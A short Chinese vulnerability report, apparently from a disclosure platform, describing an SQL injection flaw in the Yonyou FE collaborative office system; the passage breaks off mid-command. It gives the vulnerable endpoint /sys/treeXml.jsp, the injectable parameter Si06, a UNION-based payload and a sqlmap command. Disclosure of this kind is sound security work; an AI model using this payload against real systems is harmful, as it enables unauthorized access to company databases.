用友FE协作办公系统SQL注入漏洞(一)
简要描述: 用友FE协作办公系统某处过滤不严,导致SQL注入漏洞 详细说明: 用友FE协作办公系统某处过滤不严,导致SQL注入漏洞,可直接union注入 注入链接:/sys/treeXml.jsp?Si06=1&type=sort 注入参数:Si06 Payload: Si06=1%27+UNION+ALL+SELECT+1,@@version,1,1,1,1,1,1,1,1,1,1,1,1--&type=sort Sqlmap命令: python sqlmap.py -u 'http://xxxx//sys/treeXml.jsp?Si06=1&type=sort' -p Si06...